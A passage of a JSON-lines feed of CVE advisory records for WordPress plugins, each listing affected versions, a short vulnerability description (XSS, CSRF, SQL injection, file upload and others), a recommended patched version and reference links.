{"CVE_ID":"CVE-2023-5167","slug":"user-activity-log-pro","versionImpact":"2.3.3","versionEndExcluding":"2.3.4","description":"The User Activity Log Pro WordPress plugin before 2.3.4 does not properly escape recorded User-Agents in the user activity logs dashboard, which may allow visitors to conduct Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/78ea6fe0-5fac-4923-949c-023c85fe2437\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/78ea6fe0-5fac-4923-949c-023c85fe2437\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5133","slug":"user-activity-log-pro","versionImpact":"2.3.3","versionEndExcluding":"2.3.4","description":"This user-activity-log-pro WordPress plugin before 2.3.4 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.","recommendation":"Update to version 2.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36c30e54-75e4-4df1-b01a-60c51c0e76a3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36c30e54-75e4-4df1-b01a-60c51c0e76a3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34029","slug":"disable-update-notifications","versionEndExcluding":"2.3.3","description":"Cross-Site Request Forgery (CSRF) vulnerability in Prem Tiwari Disable WordPress Update Notifications and auto-update Email Notifications plugin <=\u00a02.3.3 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/disable-update-notifications\\\/wordpress-disable-wordpress-update-notifications-and-auto-update-email-notifications-plugin-2-3-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/disable-update-notifications\\\/wordpress-disable-wordpress-update-notifications-and-auto-update-email-notifications-plugin-2-3-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5116","slug":"ipushpull","versionImpact":"2.3.2","versionEndExcluding":"2.3.3","description":"The Live updates from Excel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ipushpull_page' shortcode in versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab856722-e954-49de-a93f-46664da6e3e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab856722-e954-49de-a93f-46664da6e3e8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ipushpull\\\/trunk\\\/public\\\/class-ipushpull-public.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ipushpull\\\/trunk\\\/public\\\/class-ipushpull-public.php#L113\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13337","slug":"clearfy","versionImpact":"2.3.2","versionEndExcluding":"2.3.3","description":"The Clearfy Cache \u2013 WordPress optimization plugin, Minify HTML, CSS & JS, Defer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.3.2. This is due to missing or incorrect nonce validation on the 'setup-wbcr_clearfy' page. This makes it possible for unauthenticated attackers to update the plugins settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.dev\\\/WordPressPluginDirectory\\\/clearfy\",\"name\":\"https:\\\/\\\/github.dev\\\/WordPressPluginDirectory\\\/clearfy\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268278\\\/clearfy\\\/trunk\\\/libs\\\/factory\\\/templates\\\/pages\\\/setup-parts\\\/class-step-form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268278\\\/clearfy\\\/trunk\\\/libs\\\/factory\\\/templates\\\/pages\\\/setup-parts\\\/class-step-form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7f21dbe-f300-4336-9980-a69d40395f39?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7f21dbe-f300-4336-9980-a69d40395f39?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13535","slug":"actionwear-products-sync","versionImpact":"2.3.2","versionEndExcluding":"2.3.3","description":"The Actionwear products sync plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.3.0. This is due the composer-setup.php file being publicly accessible with 'display_errors' set to true. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 2.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/actionwear-products-sync\\\/trunk\\\/composer-setup.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/actionwear-products-sync\\\/trunk\\\/composer-setup.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dbf9689-c812-4b7c-9df3-c4639aae3357?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dbf9689-c812-4b7c-9df3-c4639aae3357?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13434","slug":"wp-inventory-manager","versionImpact":"2.3.2","versionEndExcluding":"2.3.3","description":"The WP Inventory Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'message' parameter in all versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223184%40wp-inventory-manager&new=3223184%40wp-inventory-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3223184%40wp-inventory-manager&new=3223184%40wp-inventory-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e3069d4-12b8-4949-9daf-0e01590799da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e3069d4-12b8-4949-9daf-0e01590799da?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3587","slug":"auxin-portfolio","versionImpact":"2.3.2","versionEndExcluding":"2.3.3","description":"The Premium Portfolio Features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Grid Portfolios Widget in all versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0ea041b-f09d-4c62-aada-26afbc60b6f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0ea041b-f09d-4c62-aada-26afbc60b6f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-portfolio\\\/tags\\\/2.3.2\\\/public\\\/templates\\\/elements\\\/recent-portfolio.php#L179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-portfolio\\\/tags\\\/2.3.2\\\/public\\\/templates\\\/elements\\\/recent-portfolio.php#L179\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115537\\\/auxin-portfolio\\\/trunk\\\/public\\\/templates\\\/elements\\\/recent-portfolio.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115537\\\/auxin-portfolio\\\/trunk\\\/public\\\/templates\\\/elements\\\/recent-portfolio.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50845","slug":"geodirectory","versionEndExcluding":"2.3.29","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AyeCode - WordPress Business Directory Plugins GeoDirectory \u2013 WordPress Business Directory Plugin, or Classified Directory.This issue affects GeoDirectory \u2013 WordPress Business Directory Plugin, or Classified Directory: from n\/a through 2.3.28.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/geodirectory\\\/wordpress-geodirectory-plugin-2-3-28-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/geodirectory\\\/wordpress-geodirectory-plugin-2-3-28-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4759","slug":"gigpress","versionEndExcluding":"2.3.28","description":"The GigPress WordPress plugin before 2.3.28 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/63328927-5614-4fa1-8f46-46ff0c8eb959\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/63328927-5614-4fa1-8f46-46ff0c8eb959\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0171","slug":"jquery-t-countdown-widget","versionEndExcluding":"2.3.24","description":"The jQuery T(-) Countdown Widget WordPress plugin before 2.3.24 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32324655-ff91-4a53-a2c5-ebe6678d4a9d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32324655-ff91-4a53-a2c5-ebe6678d4a9d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36731","slug":"flexible-checkout-fields","versionEndExcluding":"2.3.2","description":"The Flexible Checkout Fields for WooCommerce  plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to missing authorization checks on the updateSettingsAction() function which is called via an admin_init hook, along with missing sanitization and escaping on the settings that are stored.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd12a952-2e99-41f7-b74c-55c2b7d8deed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd12a952-2e99-41f7-b74c-55c2b7d8deed?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/zero-day-vulnerability-fixed-in-wordpress-flexible-checkout-fields-for-woocommerce-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/zero-day-vulnerability-fixed-in-wordpress-flexible-checkout-fields-for-woocommerce-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/02\\\/site-takeover-campaign-exploits-multiple-zero-day-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2020\\\/02\\\/site-takeover-campaign-exploits-multiple-zero-day-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7431","slug":"knowledgebase","versionImpact":"2.3.1","versionEndExcluding":"2.3.2","description":"The Knowledge Base plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin slug setting in all versions up to, and including, 2.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/knowledgebase\\\/tags\\\/2.3.1\\\/includes\\\/admin\\\/settings\\\/class-settings.php#L290\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/knowledgebase\\\/tags\\\/2.3.1\\\/includes\\\/admin\\\/settings\\\/class-settings.php#L290\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b405b5cb-b330-4bd6-87bd-fa97ded58460?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b405b5cb-b330-4bd6-87bd-fa97ded58460?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13338","slug":"clearfy","versionImpact":"2.3.1","versionEndExcluding":"2.3.2","description":"The Clearfy Cache \u2013 WordPress optimization plugin, Minify HTML, CSS & JS, Defer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.3.1. This is due to missing or incorrect nonce validation on the wclearfy_cache_delete functionality . This makes it possible for unauthenticated attackers to clear the cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268278\\\/clearfy\\\/trunk\\\/components\\\/cache\\\/includes\\\/cache.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268278\\\/clearfy\\\/trunk\\\/components\\\/cache\\\/includes\\\/cache.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0a37ce4-9860-415e-bb88-545c30c95fc1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0a37ce4-9860-415e-bb88-545c30c95fc1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10683","slug":"contact-form-7-paypal-add-on","versionImpact":"2.3.1","versionEndExcluding":"2.3.2","description":"The Contact Form 7 \u2013 PayPal & Stripe Add-on plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.3.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This is only exploitable when the leave a review notice is present in the dashboard.","recommendation":"Update to version 2.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49e741c9-0cc7-4a62-a920-4fd997bee280?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49e741c9-0cc7-4a62-a920-4fd997bee280?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7-paypal-add-on\\\/tags\\\/2.3.1\\\/includes\\\/admin\\\/notices.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7-paypal-add-on\\\/tags\\\/2.3.1\\\/includes\\\/admin\\\/notices.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7-paypal-add-on\\\/tags\\\/2.3.1\\\/includes\\\/admin\\\/notices.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-7-paypal-add-on\\\/tags\\\/2.3.1\\\/includes\\\/admin\\\/notices.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182753\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182753\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-44233","slug":"foogallery","versionImpact":"2.2.44","versionEndExcluding":"2.3.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in FooPlugins Best WordPress Gallery Plugin \u2013 FooGallery plugin <=\u00a02.2.44 versions.","recommendation":"Update to version 2.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/foogallery\\\/wordpress-foogallery-plugin-2-2-44-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/foogallery\\\/wordpress-foogallery-plugin-2-2-44-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-45370","slug":"comments-import-export-woocommerce","versionEndExcluding":"2.3.2","description":"Improper Neutralization of Formula Elements in a CSV File vulnerability in WebToffee WordPress Comments Import & Export.This issue affects WordPress Comments Import & Export: from n\/a through 2.3.1.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/comments-import-export-woocommerce\\\/wordpress-wordpress-comments-import-export-plugin-2-3-1-csv-injection?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/comments-import-export-woocommerce\\\/wordpress-wordpress-comments-import-export-plugin-2-3-1-csv-injection?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4354","slug":"tablepress","versionImpact":"2.3.1","versionEndExcluding":"2.3.2","description":"The TablePress \u2013 Tables in WordPress made easy plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.3 via the get_files_to_import() function. This makes it possible for authenticated attackers, with author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. Due to the complex nature of protecting against DNS rebind attacks in WordPress software, we settled on the developer simply restricting the usage of the URL import functionality to just administrators. While this is not optimal, we feel this poses a minimal risk to most site owners and ideally WordPress core would correct this issue in wp_safe_remote_get() and other functions.","recommendation":"Update to version 2.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/879384eb-bfea-4667-a7de-9f723dbea74b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/879384eb-bfea-4667-a7de-9f723dbea74b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tablepress\\\/trunk\\\/classes\\\/class-import.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tablepress\\\/trunk\\\/classes\\\/class-import.php#L125\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.clear-gate.com\\\/blog\\\/ssrf-with-dns-rebinding-2\\\/\",\"name\":\"https:\\\/\\\/www.clear-gate.com\\\/blog\\\/ssrf-with-dns-rebinding-2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tablepress\\\/trunk\\\/classes\\\/class-import.php#L141\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tablepress\\\/trunk\\\/classes\\\/class-import.php#L141\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3097113%40tablepress&new=3097113%40tablepress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3097113%40tablepress&new=3097113%40tablepress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5035","slug":"easy-fancybox","versionImpact":"2.3.15","versionEndExcluding":"2.3.16","description":"The Firelight Lightbox WordPress plugin before 2.3.16 does not sanitise and escape title attributes before outputting them in the page, which could allow users with a role as low as contributors to perform stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.3.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5dca30af-4624-4a71-93be-00fa8dc00c97\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5dca30af-4624-4a71-93be-00fa8dc00c97\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5dca30af-4624-4a71-93be-00fa8dc00c97\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5dca30af-4624-4a71-93be-00fa8dc00c97\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3597","slug":"easy-fancybox","versionImpact":"2.3.14","versionEndExcluding":"2.3.15","description":"The Firelight Lightbox WordPress plugin before 2.3.15 does not prevent users with post writing capabilities from executing arbitrary Javascript when the jQuery Metadata library is enabled. While this feature is meant to only be available to Pro version users, it can be activated in the free version too, making it theoretically exploitable there as well.","recommendation":"Update to version 2.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8bf5e107-6397-4946-aaee-bf61d3e2dffd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8bf5e107-6397-4946-aaee-bf61d3e2dffd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4091","slug":"responsive-gallery-grid","versionImpact":"2.3.14","versionEndExcluding":"2.3.15","description":"The Responsive Gallery Grid WordPress plugin before 2.3.15 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 2.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e28e79fa-f461-41fe-ad1c-ca768ea5f982\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e28e79fa-f461-41fe-ad1c-ca768ea5f982\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1483","slug":"ltl-freight-quotes-globaltranz-edition","versionImpact":"2.3.12","versionEndExcluding":"2.3.13","description":"The LTL Freight Quotes \u2013 GlobalTranz Edition plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the engtz_wd_save_dropship AJAX endpoint in all versions up to, and including, 2.3.12. This makes it possible for unauthenticated attackers to update the drop shipping settings.","recommendation":"Update to version 2.3.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243002\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243002\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0906e9b0-5093-4ddd-8868-8fcaad8e3a5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0906e9b0-5093-4ddd-8868-8fcaad8e3a5b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13476","slug":"ltl-freight-quotes-globaltranz-edition","versionImpact":"2.3.11","versionEndExcluding":"2.3.12","description":"The LTL Freight Quotes \u2013 GlobalTranz Edition plugin for WordPress is vulnerable to SQL Injection via the 'engtz_wd_save_dropship' AJAX endpoint in all versions up to, and including, 2.3.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.3.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242457\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242457\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb7c846-c82b-40c8-a5ae-88b30c761ba9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb7c846-c82b-40c8-a5ae-88b30c761ba9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6319","slug":"imgspider","versionImpact":"2.3.10","versionEndExcluding":"2.3.11","description":"The IMGspider plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'upload' function in all versions up to, and including, 2.3.10. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.3.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63a4a077-c99e-4742-9fa1-f323fd24b950?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63a4a077-c99e-4742-9fa1-f323fd24b950?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imgspider\\\/tags\\\/2.3.10\\\/classes\\\/post.class.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imgspider\\\/tags\\\/2.3.10\\\/classes\\\/post.class.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107741\\\/imgspider\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107741\\\/imgspider\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6318","slug":"imgspider","versionImpact":"2.3.10","versionEndExcluding":"2.3.11","description":"The IMGspider plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'upload_img_file' function in all versions up to, and including, 2.3.10. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.3.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/306f00e4-9a70-48be-a91e-e396643a8129?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/306f00e4-9a70-48be-a91e-e396643a8129?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imgspider\\\/tags\\\/2.3.10\\\/classes\\\/post.class.php#L122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/imgspider\\\/tags\\\/2.3.10\\\/classes\\\/post.class.php#L122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107741\\\/imgspider\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107741\\\/imgspider\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36759","slug":"insert-php","versionEndExcluding":"2.3.10","description":"The Woody code snippets plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.3.9. This is due to missing or incorrect nonce validation on the runActions() function. This makes it possible for unauthenticated attackers to activate and deactivate snippets via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.3.10, or a newer patched 